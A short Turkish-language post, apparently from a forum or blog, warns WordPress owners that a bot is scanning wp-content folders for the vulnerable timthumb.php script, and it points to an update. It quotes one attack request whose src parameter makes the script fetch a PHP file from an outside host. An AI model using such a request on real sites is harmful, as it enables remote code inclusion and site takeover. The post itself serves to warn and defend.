timthump.php dosyası üzerinden sitenize saldırı gerçekleştiriliyor olabilir. Son birkaç gündür tüm wp-content.... uzantısındaki klasörleri tarayan bir bot mevcut.
İp adresi almanya kaynaklı ve 85.214.*.* sonu değişken.

Tarama şekli şöyle : timthumb.php?src=http://flickr.com.finnovations.de/parola.php Tüm klasörleri böyle tarıyor.

parola.php dosyasından da anlaşıldığı gibi bu bir türk. Ne halt etmeye çalışıyor bilmiyorum ama yabancı bir site bu konuda yazı yazmış.


Buyrun: http://www.lavandeira.net/2013/04/one-of-todays-attacks-to-this-web-server/

Dosyayı buradan güncelleyebilirsiniz. https://code.google.com/p/timthumb/